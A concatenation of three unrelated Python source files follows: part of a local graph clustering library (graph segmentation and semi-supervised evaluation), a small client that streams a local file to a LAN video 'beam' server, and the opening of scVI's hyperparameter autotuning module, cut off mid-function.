A = g_copy.adjacency_matrix.tocsr()[indices, :].tocsc()[:, indices]
g_copy = GraphLocal.from_sparse_adjacency(A)
print ("Percentage completed: ", 100-len(candidates)/g._num_vertices*100, end="\r")
if len(candidates) <= g._num_vertices*ratio:
for i in candidates:
labels[i] = ct
ct += 1
return labels, info
def graph_segmentation_with_improve(g,
rho_list,
alpha_list,
localmethod: str = 'l1reg-rand',
normalize: bool = False,
normalized_objective: bool = False,
cpp: bool = True,
epsilon: float = 1.0e-2,
iterations: int = 10000000,
nsamples_from_rho: int = 50,
nsamples_from_alpha: int = 50,
njobs = 1,
prefer: str = 'threads',
backend: str = 'multiprocessing',
how_many_in_parallel = 5,
ratio = 0.01):
"""
Segment the graph into pieces by peeling off clusters in parallel using local graph clustering.
--------------------------------
Parameters
----------
g: GraphLocal
rho_list: 2D list of floats
This is an interval of rhos, the regularization parameter for l1-regularized PageRank.
The first element should be smaller than the second elelement of the list.
alpha_list: 2D list of floats
This is an interval of alphas, the teleportation parameter for l1-regularized PageRank.
The first element should be smaller than the second elelement of the list.
The smaller the more global the personalized PageRank vector is.
Parameters (optional)
---------------------
nsamples_from_rho: int
Number of samples of rho parameters to be selected from interval rho_list.
nsamples_from_alpha: int
Number of samples of alpha parameters to be selected from interval alpha_list.
localmethod: string
Default = 'l1reg-rand'
Which method to use.
Options: 'l1reg', 'l1reg-rand'.
iterations: int
Default = 1000000
Maximum number of iterations of ACL algorithm.
epsilon: float
Default = 1.0e-2
Tolerance for localmethod
normalize: bool
Default = True
Normalize the output to be directly input into sweepcut routines.
normalized_objective: bool
Default = True
Use normalized Laplacian in the objective function, works only for "method=l1reg" and "cpp=True"
cpp: bool
Default = True
If true calls the cpp code for approximate pagerank, otherwise, it calls the python code.
njobs: int
Default = 1
Number of jobs to be run in parallel
prefer, backend: str
Check documentation of https://joblib.readthedocs.io/en/latest/
how_many_in_parallel: int
Default = 20
Number of segments that are computed in parallel.
There is a trade-off here.
ratio: float
Default = 0.01
Let n be the number of nodes, this segmentation code will ignore the last ratio*n nodes,
and it will cluster them as one cluster.
Returns
-------
info: list of lists
Each element of the list is another list with two elements.
The first element is the indices of the a segment, while the second element
is the vector representation of that segment.
labels: np.ndarray
An np.ndarray of the cluster allocation of each node.
For example labels[i] is the cluster of node i.
"""
g_copy = GraphLocal.from_sparse_adjacency(g.adjacency_matrix)
candidates = list(range(g_copy._num_vertices))
labels = np.zeros(g_copy._num_vertices,dtype=np.int32)
info = []
ct = 0
while True:
if njobs > 1:
select_from = list(range(g_copy._num_vertices))
ref_nodes = random.sample(select_from, min(how_many_in_parallel,len(select_from)))
results = Parallel(n_jobs=njobs, prefer=prefer, backend=backend)(delayed(compute_embedding_and_improve)(g_copy,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in ref_nodes)
else:
select_from = list(range(g_copy._num_vertices))
ref_nodes = random.sample(select_from, njobs)
results =[compute_embedding_and_improve(g_copy,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in ref_nodes]
union_sets_to_remove = set()
for res in results:
idx = [candidates[i] for i in res[0]]
labels[idx] = ct
ct += 1
union_sets_to_remove.update(res[0])
info.append([idx,res[1]])
for index in sorted(list(union_sets_to_remove), reverse=True):
del candidates[index]
indices = list(set(range(g_copy._num_vertices)) - set(union_sets_to_remove))
A = g_copy.adjacency_matrix.tocsr()[indices, :].tocsc()[:, indices]
g_copy = GraphLocal.from_sparse_adjacency(A)
print ("Percentage completed: ", 100-len(candidates)/g._num_vertices*100, end="\r")
if len(candidates) <= g._num_vertices*ratio:
for i in candidates:
labels[i] = ct
ct += 1
return labels, info
def compute_embeddings_and_distances_from_region_adjacency(g,info, metric='euclidean', norm_type = 2, n_jobs=1):
"""
This method runs local graph clustering for each node in the region adjacency graph.
Returns the embeddings for each node in a matrix X. Each row corresponds to an embedding
of a node in the region adjacency graph. It also returns the pairwise distance matrix Z.
For example, component Z[i,j] is the distance between nodes i and j.
Parameters
----------
g: GraphLocal
info: list of lists
Each element of the list is another list with two elements.
The first element is the indices of the a segment, while the second element
is the vector representation of that segment.
Parameters (optional)
---------------------
metric: str
Default = 'euclidean'
Metric for measuring distances among nodes.
For details check:
https://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise_distances.html
norm_type: int
Default = 2
Norm for normalization of the embeddings.
njobs: int
Default = 1
Number of jobs to be run in parallel
Returns
-------
X: csc matrix
The embeddings matrix. Each row corresponds to an embedding of a node in the regiona adjacency graph.
Z: 2D np.ndarray
The pairwise distance matrix Z. For example, component Z[i,j]
is the distance between nodes i and j.
"""
sum_ = 0
JA = [0]
IA = []
A = []
for data in info:
vec = data[1]/np.linalg.norm(data[1],norm_type)
how_many = len(data[0])
sum_ += how_many
JA.append(sum_)
IA.extend(list(data[0]))
A.extend(list(vec))
X = sp.sparse.csc_matrix((A, IA, JA), shape=(g._num_vertices, len(info)))
X = X.transpose()
Z = pairwise_distances(X, metric='euclidean', n_jobs=6)
return X, Z
def compute_clusters_from_region_adjacency(g,nclusters,Z,info,linkage: str = 'complete'):
"""
Find clusters in a graph using a region adjacency graph.
--------------------------------
Each node represents a segment in the original graph.
Each segment is represented by a sparse local graph clustering vector.
Then it uses agglomerative clustering to find the clusters.
Parameters
----------
g: GraphLocal
nclusters: int
Number of clusters to be returned
Z: 2D np.ndarray
The pairwise distance matrix Z. For example, component Z[i,j]
is the distance between nodes i and j.
info: list of lists
Each element of the list is another list with two elements.
The first element is the indices of the a segment, while the second element
is the vector representation of that segment.
Parameters (optional)
---------------------
linkage: str
Default = 'complete'
Which linkage criterion to use for agglomerative clustering.
For other options check:
https://scikit-learn.org/stable/modules/generated/sklearn.cluster.AgglomerativeClustering.html
Returns
-------
labels: np.ndarray
An np.ndarray of the cluster allocation of each node.
For example labels[i] is the cluster of node i.
"""
clustering = AgglomerativeClustering(n_clusters=nclusters,affinity="precomputed",linkage=linkage).fit(Z)
labels = clustering.labels_
expanded_labels = np.zeros(g._num_vertices, dtype=int)
for i in range(len(labels)):
for j in info[i][0]:
expanded_labels[j] = labels[i]
return expanded_labels
def semisupervised_learning_with_improve(g,truth,kwargs_list,nprocs=1):
input_size_all = []
l1reg_PR_all = []
l1reg_RC_all = []
l1reg_F1_all = []
mqi_PR_all = []
mqi_RC_all = []
mqi_F1_all = []
flow_PR_all = []
flow_RC_all = []
flow_F1_all = []
def wrapper(q_in,q_out):
while True:
kwargs = q_in.get()
if kwargs is None:
break
delta = kwargs["delta"]
del kwargs["delta"]
ntrials = 0
input_size_curr = []
l1reg_PR_curr = []
l1reg_RC_curr = []
l1reg_F1_curr = []
mqi_PR_curr = []
mqi_RC_curr = []
mqi_F1_curr = []
flow_PR_curr = []
flow_RC_curr = []
flow_F1_curr = []
while ntrials < 20:
seed_node = np.random.choice(truth)
l1reg_output = spectral_clustering(g,[seed_node],**kwargs)[0]
if len(l1reg_output) == 0:
continue
input_size_curr.append(len(l1reg_output))
if g.weighted:
mqi_output = flow_clustering(g,l1reg_output,method="mqi_weighted")[0]
flow_output = flow_clustering(g,l1reg_output,method="flow_weighted",delta=delta)[0]
else:
mqi_output = flow_clustering(g,l1reg_output,method="mqi")[0]
flow_output = flow_clustering(g,l1reg_output,method="flow",delta=delta)[0]
l1reg_PR = len(set(truth).intersection(l1reg_output))/(1.0*len(l1reg_output))
l1reg_RC = len(set(truth).intersection(l1reg_output))/(1.0*len(truth))
l1reg_PR_curr.append(l1reg_PR)
l1reg_RC_curr.append(l1reg_RC)
l1reg_F1_curr.append(2*(l1reg_PR*l1reg_RC)/(l1reg_PR+l1reg_RC)) if (l1reg_PR+l1reg_RC) > 0 else 0
mqi_PR = len(set(truth).intersection(mqi_output))/(1.0*len(mqi_output))
mqi_RC = len(set(truth).intersection(mqi_output))/(1.0*len(truth))
mqi_PR_curr.append(mqi_PR)
mqi_RC_curr.append(mqi_RC)
mqi_F1_curr.append(2*(mqi_PR*mqi_RC)/(mqi_PR+mqi_RC)) if (mqi_PR+mqi_RC) > 0 else 0
flow_PR = len(set(truth).intersection(flow_output))/(1.0*len(flow_output))
flow_RC = len(set(truth).intersection(flow_output))/(1.0*len(truth))
flow_PR_curr.append(flow_PR)
flow_RC_curr.append(flow_RC)
flow_F1_curr.append(2*(flow_PR*flow_RC)/(flow_PR+flow_RC)) if (flow_PR+flow_RC) > 0 else 0
ntrials += 1
q_out.put((np.mean(input_size_curr),np.std(input_size_curr),
np.mean(l1reg_PR_curr),np.std(l1reg_PR_curr),
np.mean(l1reg_RC_curr),np.std(l1reg_RC_curr),
np.mean(l1reg_F1_curr),np.std(l1reg_F1_curr),
np.mean(mqi_PR_curr),np.std(mqi_PR_curr),
np.mean(mqi_RC_curr),np.std(mqi_RC_curr),
np.mean(mqi_F1_curr),np.std(mqi_F1_curr),
np.mean(flow_PR_curr),np.std(flow_PR_curr),
np.mean(flow_RC_curr),np.std(flow_RC_curr),
np.mean(flow_F1_curr),np.std(flow_F1_curr)))
q_in,q_out = mp.Queue(),mp.Queue()
for kwargs in kwargs_list:
q_in.put(kwargs)
for _ in range(nprocs):
q_in.put(None)
procs = [mp.Process(target=wrapper,args=(q_in,q_out)) for _ in range(nprocs)]
for p in procs:
p.start()
ncounts = 0
while ncounts < len(kwargs_list):
output = q_out.get()
input_size_all.append((output[0],output[1]))
l1reg_PR_all.append((output[2],output[3]))
l1reg_RC_all.append((output[4],output[5]))
l1reg_F1_all.append((output[6],output[7]))
mqi_PR_all.append((output[8],output[9]))
mqi_RC_all.append((output[10],output[11]))
mqi_F1_all.append((output[12],output[13]))
flow_PR_all.append((output[14],output[15]))
flow_RC_all.append((output[16],output[17]))
flow_F1_all.append((output[18],output[19]))
ncounts += 1
for p in procs:
p.join()
return locals()
def semisupervised_learning(g,truth_dict,kwargs_list,nprocs=1,size_ratio=0.1,use_bfs=True,flowmethod="mqi_weighted",use_spectral=True):
l1reg_PR_all = np.zeros((len(kwargs_list),3))
l1reg_RC_all = np.zeros((len(kwargs_list),3))
l1reg_F1_all = np.zeros((len(kwargs_list),3))
flow_PR_all = np.zeros((len(kwargs_list),3))
flow_RC_all = np.zeros((len(kwargs_list),3))
flow_F1_all = np.zeros((len(kwargs_list),3))
flow_PR_all1 = np.zeros((len(kwargs_list),3))
flow_RC_all1 = np.zeros((len(kwargs_list),3))
flow_F1_all1 = np.zeros((len(kwargs_list),3))
l1reg_PR_curr = defaultdict(list)
l1reg_RC_curr = defaultdict(list)
l1reg_F1_curr = defaultdict(list)
flow_PR_curr = defaultdict(list)
flow_RC_curr = defaultdict(list)
flow_F1_curr = defaultdict(list)
flow_PR_curr1 = defaultdict(list)
flow_RC_curr1 = defaultdict(list)
flow_F1_curr1 = defaultdict(list)
total_vol = np.sum(g.d)
def wrapper(pid,q_in,q_out):
while True:
kwargs,kwargs_id,trial_id,delta,delta1,ratio = q_in.get()
if kwargs is None:
break
nlabels = len(list(truth_dict.keys()))
l1reg_labels = np.zeros(g._num_vertices) - 1
true_labels = np.zeros(g._num_vertices) - 1
flow_labels = np.zeros(g._num_vertices) - 1
flow_labels1 = np.zeros(g._num_vertices) - 1
ranking = np.zeros(g._num_vertices) - 1
npositives = 0
for lid,label in enumerate(sorted(list(truth_dict.keys()))):
truth = truth_dict[label]
npositives += len(truth)
true_labels[truth] = lid
nseeds = int(ratio*len(truth))
np.random.seed(1000*kwargs_id+10*trial_id+lid)
seeds = np.random.choice(truth,nseeds)
if use_spectral:
l1reg_ids,l1reg_vals = approximate_pagerank(g, seeds, **kwargs)
sorted_indices = np.argsort(-1*l1reg_vals)
for i,idx in enumerate(sorted_indices):
if ranking[l1reg_ids[idx]] == -1 or i < ranking[l1reg_ids[idx]]:
ranking[l1reg_ids[idx]] = i
l1reg_labels[l1reg_ids[idx]] = lid
#flow_output1 = flow_clustering(g,seeds,method=flowmethod,delta=curr_vol/(total_vol-curr_vol))[0]
if use_bfs:
seeds = seed_grow_bfs_steps(g,seeds,1)
flow_output = flow_clustering(g,seeds,method=flowmethod,delta=delta)[0]
flow_output1 = flow_clustering(g,seeds,method=flowmethod,delta=delta1)[0]
curr_vol = np.sum(g.d[seeds])
for i,idx in enumerate(flow_output):
if flow_labels[idx] == -1:
flow_labels[idx] = lid
else:
flow_labels[idx] = nlabels + 1
for i,idx in enumerate(flow_output1):
if flow_labels1[idx] == -1:
flow_labels1[idx] = lid
else:
flow_labels1[idx] = nlabels + 1
if use_spectral:
l1reg_PR = np.sum((l1reg_labels == true_labels))/(1.0*np.sum(l1reg_labels!=-1))
l1reg_RC = np.sum((l1reg_labels == true_labels))/(1.0*npositives)
l1reg_F1 = 2*(l1reg_PR*l1reg_RC)/(l1reg_PR+l1reg_RC) if (l1reg_PR+l1reg_RC) > 0 else 0
else:
l1reg_PR,l1reg_RC,l1reg_F1 = 0,0,0
# l1reg_PR_curr.append(l1reg_PR)
# l1reg_RC_curr.append(l1reg_RC)
# l1reg_F1_curr.append()
flow_PR = np.sum((flow_labels == true_labels))/(1.0*np.sum(flow_labels!=-1))
flow_RC = np.sum((flow_labels == true_labels))/(1.0*npositives)
flow_F1 = 2*(flow_PR*flow_RC)/(flow_PR+flow_RC) if (flow_PR+flow_RC) > 0 else 0
flow_PR1 = np.sum((flow_labels1 == true_labels))/(1.0*np.sum(flow_labels1!=-1))
flow_RC1 = np.sum((flow_labels1 == true_labels))/(1.0*npositives)
flow_F11 = 2*(flow_PR1*flow_RC1)/(flow_PR1+flow_RC1) if (flow_PR1+flow_RC1) > 0 else 0
# flow_PR_curr.append(flow_PR)
# flow_RC_curr.append(flow_RC)
# flow_F1_curr.append()
q_out.put((kwargs_id,trial_id,l1reg_PR,l1reg_RC,l1reg_F1,flow_PR,flow_RC,flow_F1,flow_PR1,flow_RC1,flow_F11))
q_in,q_out = mp.Queue(),mp.Queue()
ntrials = 30
for kwargs_id in range(len(kwargs_list)):
kwargs = copy.deepcopy(kwargs_list[kwargs_id])
delta = kwargs["delta"]
del kwargs["delta"]
delta1 = kwargs["delta1"]
del kwargs["delta1"]
ratio = kwargs["ratio"]
del kwargs["ratio"]
for trial_id in range(ntrials):
q_in.put((kwargs,kwargs_id,trial_id,delta,delta1,ratio))
for _ in range(nprocs):
q_in.put((None,None,None,None,None,None))
procs = [mp.Process(target=wrapper,args=(pid,q_in,q_out)) for pid in range(nprocs)]
for p in procs:
p.start()
ncounts = 0
while ncounts < len(kwargs_list)*ntrials:
if ncounts%10 == 0:
print("Finished "+str(ncounts)+"/"+str(len(kwargs_list)*ntrials)+" experiments.")
kwargs_id,trial_id,l1reg_PR,l1reg_RC,l1reg_F1,flow_PR,flow_RC,flow_F1,flow_PR1,flow_RC1,flow_F11 = q_out.get()
l1reg_PR_curr[kwargs_id].append(l1reg_PR)
l1reg_RC_curr[kwargs_id].append(l1reg_RC)
l1reg_F1_curr[kwargs_id].append(l1reg_F1)
flow_PR_curr[kwargs_id].append(flow_PR)
flow_RC_curr[kwargs_id].append(flow_RC)
flow_F1_curr[kwargs_id].append(flow_F1)
flow_PR_curr1[kwargs_id].append(flow_PR1)
flow_RC_curr1[kwargs_id].append(flow_RC1)
flow_F1_curr1[kwargs_id].append(flow_F11)
if trial_id == ntrials - 1:
l1reg_PR_all[kwargs_id] = [np.median(l1reg_PR_curr[kwargs_id]),np.percentile(l1reg_PR_curr[kwargs_id],q=20),
np.percentile(l1reg_PR_curr[kwargs_id],q=80)]
l1reg_RC_all[kwargs_id] = [np.median(l1reg_RC_curr[kwargs_id]),np.percentile(l1reg_RC_curr[kwargs_id],q=20),
np.percentile(l1reg_RC_curr[kwargs_id],q=80)]
l1reg_F1_all[kwargs_id] = [np.median(l1reg_F1_curr[kwargs_id]),np.percentile(l1reg_F1_curr[kwargs_id],q=20),
np.percentile(l1reg_F1_curr[kwargs_id],q=80)]
flow_PR_all[kwargs_id] = [np.median(flow_PR_curr[kwargs_id]),np.percentile(flow_PR_curr[kwargs_id],q=20),
np.percentile(flow_PR_curr[kwargs_id],q=80)]
flow_RC_all[kwargs_id] = [np.median(flow_RC_curr[kwargs_id]),np.percentile(flow_RC_curr[kwargs_id],q=20),
np.percentile(flow_RC_curr[kwargs_id],q=80)]
flow_F1_all[kwargs_id] = [np.median(flow_F1_curr[kwargs_id]),np.percentile(flow_F1_curr[kwargs_id],q=20),
np.percentile(flow_F1_curr[kwargs_id],q=80)]
flow_PR_all1[kwargs_id] = [np.median(flow_PR_curr1[kwargs_id]),np.percentile(flow_PR_curr1[kwargs_id],q=20),
np.percentile(flow_PR_curr1[kwargs_id],q=80)]
flow_RC_all1[kwargs_id] = [np.median(flow_RC_curr1[kwargs_id]),np.percentile(flow_RC_curr1[kwargs_id],q=20),
np.percentile(flow_RC_curr1[kwargs_id],q=80)]
flow_F1_all1[kwargs_id] = [np.median(flow_F1_curr1[kwargs_id]),np.percentile(flow_F1_curr1[kwargs_id],q=20),
np.percentile(flow_F1_curr1[kwargs_id],q=80)]
ncounts += 1
for p in procs:
p.join()
del procs
del p
del q_in
del q_out
del wrapper
return locals()
def seed_grow_bfs_steps(g,seeds,steps):
"""
grow the initial seed set through BFS until its size reaches
a given ratio of the total number of nodes.
"""
Q = queue.Queue()
visited = np.zeros(g._num_vertices)
visited[seeds] = 1
for s in seeds:
Q.put(s)
if isinstance(seeds,np.ndarray):
seeds = seeds.tolist()
else:
seeds = list(seeds)
for step in range(steps):
for k in range(Q.qsize()):
node = Q.get()
si,ei = g.adjacency_matrix.indptr[node],g.adjacency_matrix.indptr[node+1]
neighs = g.adjacency_matrix.indices[si:ei]
for i in range(len(neighs)):
if visited[neighs[i]] == 0:
visited[neighs[i]] = 1
seeds.append(neighs[i])
Q.put(neighs[i])
return seeds
def seed_grow_bfs_size(g,seeds,nseeds):
"""
grow the initial seed set through BFS until its size reaches
a given ratio of the total number of nodes.
"""
Q = queue.Queue()
visited = np.zeros(g._num_vertices)
visited[seeds] = 1
for s in seeds:
Q.put(s)
if isinstance(seeds,np.ndarray):
seeds = seeds.tolist()
else:
seeds = list(seeds)
while len(seeds) < nseeds:
node = Q.get()
si,ei = g.adjacency_matrix.indptr[node],g.adjacency_matrix.indptr[node+1]
neighs = g.adjacency_matrix.indices[si:ei]
for i in range(len(neighs)):
if visited[neighs[i]] == 0:
visited[neighs[i]] = 1
seeds.append(neighs[i])
Q.put(neighs[i])
if len(seeds) == nseeds:
break
return seeds
|
client.py
|
import os
import sys
import socket
import secrets
import tempfile
import http.server
import socketserver
from threading import Thread
from urllib.request import urlopen
PORT = 4040
BEAM_SERVER = '192.168.0.3:5005'
d = tempfile.TemporaryDirectory()
print("using tempdir " + d.name)
def handler_for_dir(dir):
def myhandler(*args, **kwargs):
kwargs['directory'] = dir
return http.server.SimpleHTTPRequestHandler(*args, **kwargs)
return myhandler
def get_request(url):
resp = urlopen(url)
return (200 <= resp.status <= 299, "\n".join([d.decode() for d in resp.readlines()]))
# get ip address (sourced from https://stackoverflow.com/a/28950776/4141651)
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
target = sys.argv[1]
id = secrets.token_hex(16)
# symlink target to tempdir so we only expose a single file
os.symlink(os.path.abspath(target), d.name + '/stream')
handler = handler_for_dir(d.name + '/')
token = None
try:
with http.server.HTTPServer(("0.0.0.0", PORT), handler) as httpd:
try:
print("serving at port", PORT)
t = Thread(target=httpd.serve_forever)
t.start()
print("calling beam target...")
host = get_ip()
resp = get_request(f'http://{BEAM_SERVER}/open?host={host}&port={PORT}')
if resp[0]:
token = resp[1].strip()
print(f"successfully started video - session {token}")
input("Just press enter when you are done...")
else:
print("Error statrtig video!")
finally:
print("shutting down server")
httpd.shutdown()
finally:
print("cleaning up")
if token:
get_request(f'http://{BEAM_SERVER}/stop/{token}')
d.cleanup()
|
autotune.py
|
import datetime
import logging
import multiprocessing
import os
import pickle
import sys
import time
import threading
from collections import defaultdict
from functools import partial, wraps
from io import IOBase
from logging.handlers import QueueListener, QueueHandler
from subprocess import Popen
from typing import Any, Callable, Dict, List, Type, Union
from queue import Empty
from hyperopt import fmin, tpe, Trials, hp, STATUS_OK, STATUS_FAIL
from hyperopt.mongoexp import (
as_mongo_str,
MongoJobs,
MongoTrials,
MongoWorker,
ReserveTimeout,
)
import numpy as np
import torch
import tqdm
from scvi.dataset import GeneExpressionDataset
from scvi.models import VAE
from . import Trainer, UnsupervisedTrainer
# TODO: add database watcher and visualizations
# TODO: make worker_launcher a subclass of threading.Thread
# TODO: and hyperopt_worker a subclass of multiprocessing.Process
# spawning is required for processes relying on cuda
spawn_ctx = multiprocessing.get_context("spawn")
fork_ctx = multiprocessing.get_context("fork")
# register running process and open files to terminate/close at exit
started_processes: List[Union[multiprocessing.Process, Popen, QueueListener]] = []
started_threads: List[threading.Thread] = []
open_files: List[IOBase] = []
# instantiate logger, handler and formatter
logger = logging.getLogger(__name__)
formatter = logging.Formatter(
"[%(asctime)s - %(processName)s - %(threadName)s] %(levelname)s - %(name)s\n%(message)s"
)
ch = logging.StreamHandler()
ch.setFormatter(formatter)
# instantiate hyperopt and autotune file handlers as global variables for clean up
fh_hyperopt = None
fh_autotune = None
# global Event to stop threads when cleaning up
cleanup_event = threading.Event()
class FminTimeoutError(Exception):
"""Thrown if fmin process hasn't finished in the allotted
time after all workers have died.
"""
class DispatchHandler:
"""A simple handler for logging events. It dispatches events to loggers
based on the name in the received record, which then get dispatched,
by the logging system, to the handlers, configured for those loggers.
"""
def handle(self, record: logging.LogRecord):
logger = logging.getLogger(record.name)
if record.levelno >= logger.level:
logger.handle(record)
class ProgressHandler:
"""A simple handler for keeping track of the worker's progress.
When assigned to a logger, logs sent using that logger trigger
an update of the progress bar associated with this handler.
"""
def __init__(self, pbar: tqdm.tqdm, disable: bool):
self.level = 0
self.pbar = pbar
self.disabled = disable
def handle(self, record: logging.LogRecord):
if not self.disabled:
self.pbar.update()
# cleanup helpers
def _cleanup_processes_files():
"""Cleanup function, starts with latest processes/files.
Terminates processes, sets cleanup_event to stop threads, closes open files."""
logger.info("Cleaning up")
logger.debug("Cleaning up: closing files")
for f in open_files[::-1]:
if not f.closed:
f.close()
logger.debug("Cleaning up: setting cleanup_event and joining threads")
cleanup_event.is_set()
for t in started_threads[::-1]:
if t.is_alive():
t.join()
logger.debug("Cleaning up: terminating processes")
for p in started_processes[::-1]:
if isinstance(p, Popen):
if p.poll() is not None:
p.terminate()
if isinstance(p, multiprocessing.Process):
if p.is_alive():
p.terminate()
if isinstance(p, QueueListener):
if p._thread is not None:
p.stop()
def _cleanup_logger():
"""Removes added handlers."""
logger.debug("Cleaning up: removing added logging handler")
for handler in logger.handlers:
if handler == ch:
logger.removeHandler(ch)
for handler in logging.getLogger("hyperopt").handlers:
if handler == fh_hyperopt:
logger.removeHandler(fh_hyperopt)
if handler == fh_autotune:
logger.removeHandler(fh_autotune)
def _cleanup_decorator(func: Callable):
"""Decorates top-level calls in order to launch cleanup when an Exception is caught."""
@wraps(func)
def decorated(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
logger.exception(
"Caught {exception} in {func}, starting cleanup".format(
exception=e.args, func=func.__name__
)
)
_cleanup_processes_files()
_cleanup_logger()
raise
return decorated
def auto_tune_scvi_model(
exp_key: str,
gene_dataset: GeneExpressionDataset,
objective_hyperopt: Callable = None,
model_class: VAE = VAE,
trainer_class: Trainer = UnsupervisedTrainer,
model_specific_kwargs: dict = None,
trainer_specific_kwargs: dict = None,
train_func_specific_kwargs: dict = None,
space: dict = None,
max_evals: int = 100,
train_best: bool = True,
pickle_result: bool = True,
save_path: str = ".",
use_batches: bool = False,
parallel: bool = True,
n_cpu_workers: int = None,
gpu_ids: List[int] = None,
n_workers_per_gpu: int = 1,
reserve_timeout: float = 30.0,
fmin_timeout: float = 300.0,
fmin_timer: float = None,
mongo_port: str = "1234",
mongo_host: str = "localhost",
db_name: str = "scvi_db",
multiple_hosts: bool = False,
) -> (Type[Trainer], Trials):
"""Perform automatic hyperparameter optimization of an scVI model
and return best model and hyperopt Trials object.
``Trials`` object contains hyperparameter space and loss history for each trial.
We provide a default hyperparameter search space (see source code),
but we recommend the user to build a custom one for each application.
Convention: fixed parameters (no default) have precedence over tunable parameters (default).
Note that the verbosity of this function has to be set using the logging module.
In particular, for the parallel case, only a progress bar is shown if the
logging level is equal or higher to ``logging.WARNING``.
:param exp_key: Name of the experiment in MongoDb.
If already exists in db, ``hyperopt`` will run a number of trainings equal to
the difference between current and previous ``max_evals``.
:param gene_dataset: scVI gene dataset.
:param objective_hyperopt: A custom objective function respecting the ``hyperopt`` format.
Roughly, it needs to return the quantity to optimize for, either directly
or in a ``dict`` under the "loss" key.
See https://github.com/hyperopt/hyperopt/wiki for a more detailed explanation.
By default, we provide an objective function which can be parametrized
through the various arguments of this function (``gene_dataset``, ``model_class``, etc.)
:param model_class: scVI model class (e.g ``VAE``, ``VAEC``, ``SCANVI``)
:param trainer_class: ``Trainer`` sub-class (e.g ``UnsupervisedTrainer``)
:param model_specific_kwargs: ``dict`` of fixed parameters which will be passed to the model.
:param trainer_specific_kwargs: ``dict`` of fixed parameters which will be passed to the trainer.
:param train_func_specific_kwargs: dict of fixed parameters which will be passed to the train method.
:param space: dict containing up to three sub-dicts with keys "model_tunable_kwargs",
"trainer_tunable_kwargs" or "train_func_tunable_kwargs".
Each of those dict contains ``hyperopt`` defined parameter spaces (e.g. ``hp.choice(..)``)
which will be passed to the corresponding object : model, trainer or train method
when performing hyper-optimization. Default: mutable, see source code.
:param max_evals: Maximum number of evaluations of the objective.
:param train_best: If ``True``, train best model and return it.
:param pickle_result: If ``True``, pickle ``Trials`` and ``Trainer`` objects using ``save_path``.
:param save_path: Path where to save best model, trainer, trials and mongo files.
:param use_batches: If ``False``, pass ``n_batch=0`` to model else pass ``gene_dataset.n_batches``.
:param parallel: If ``True``, use ``MongoTrials`` object to run trainings in parallel.
:param n_cpu_workers: Number of cpu workers to launch. If None, and no GPUs are found,
defaults to ``os.cpucount() - 1``. Else, defaults to 0.
:param gpu_ids: Ids of the GPUs to use. If None defaults to all GPUs found by ``torch``.
Note that considered gpu ids are int from 0 to ``torch.cuda.device_count()``.
:param n_workers_per_gpu: Number of workers to launch per gpu found by ``torch``.
:param reserve_timeout: Amount of time, in seconds, a worker tries to reserve a job for
before throwing a ``ReserveTimeout`` Exception.
:param fmin_timeout: Amount of time, in seconds, fmin_process has to terminate
after all workers have died - before throwing a ``FminTimeoutError``.
If ``multiple_hosts`` is set to ``True``, this is set to ``None`` to prevent timing out.
:param fmin_timer: Global amount of time allowed for fmin_process.
If not None, the minimization procedure will be stopped after ``fmin_timer`` seconds.
Used only if ``parallel`` is set to ``True``.
:param mongo_port: Port to the Mongo db.
:param mongo_host: Hostname used with ``mongo_port`` to indicate the prefix of the mongodb address.
The prefix of the address passed onto the workers and ``MongoTrials`` object
is ``'{mongo_host}:{mongo_port}'``.
:param db_name: Name to use when creating the Mongo database. Suffix of the Mongo address.
:param multiple_hosts: If ``True``, user is considered to have workers launched on several machines.
Therefore, setting this to ``True`` disables the ``fmin_timeout`` behaviour.
:return: ``Trainer`` object for the best model and ``(Mongo)Trials`` object containing logs for the different runs.
Examples:
>>> from scvi.dataset import CortexDataset
>>> gene_dataset = CortexDataset()
>>> best_trainer, trials = auto_tune_scvi_model(gene_dataset)
"""
if fmin_timer and train_best:
logger.warning(
"fmin_timer and train_best are both set to True. "
"This means that runtime will exceed fmin_timer "
"by at least the time it takes to complete a full training."
)
# if no handlers add console handler, add formatter to handlers
if len(logger.handlers) < 1:
logger.addHandler(ch)
else:
# if no formatter add default module formatter
for handler in logger.handlers:
if not handler.formatter:
handler.setFormatter(formatter)
# also add file handler
fh_autotune = logging.FileHandler(
os.path.join(save_path, "scvi_autotune_logfile.txt")
)
fh_autotune.setFormatter(formatter)
fh_autotune.setLevel(logging.DEBUG)
logger.addHandler(fh_autotune)
logger.info("Starting experiment: {exp_key}".format(exp_key=exp_key))
# default specific kwargs
model_specific_kwargs = model_specific_kwargs if model_specific_kwargs else {}
trainer_specific_kwargs = trainer_specific_kwargs if trainer_specific_kwargs else {}
train_func_specific_kwargs = (
train_func_specific_kwargs if train_func_specific_kwargs else {}
)
# default early stopping
if "early_stopping_kwargs" not in trainer_specific_kwargs:
logger.debug("Adding default early stopping behaviour.")
early_stopping_kwargs = {
"early_stopping_metric": "elbo",
"save_best_state_metric": "elbo",
"patience": 50,
"threshold": 0,
"reduce_lr_on_plateau": True,
"lr_patience": 25,
"lr_factor": 0.2,
}
trainer_specific_kwargs["early_stopping_kwargs"] = early_stopping_kwargs
# add elbo to metrics to monitor
metrics_to_monitor = trainer_specific_kwargs.get("metrics_to_monitor", [])
metrics_to_monitor.append("elbo")
trainer_specific_kwargs["metrics_to_monitor"] = metrics_to_monitor
# default search space
if space is None:
logger.debug("Using default parameter search space.")
space = {
"model_tunable_kwargs": {
"n_latent": 5 + hp.randint("n_latent", 11), # [5, 15]
"n_hidden": hp.choice("n_hidden", [64, 128, 256]),
"n_layers": 1 + hp.randint("n_layers", 5),
"dropout_rate": hp.choice("dropout_rate", [0.1, 0.3, 0.5, 0.7]),
"reconstruction_loss": hp.choice("reconstruction_loss", ["zinb", "nb"]),
},
"train_func_tunable_kwargs": {
"lr": hp.choice("lr", [0.01, 0.005, 0.001, 0.0005, 0.0001])
},
}
logger.info(
"Fixed parameters: \n"
"model: \n"
+ str(model_specific_kwargs)
+ "\n"
+ "trainer: \n"
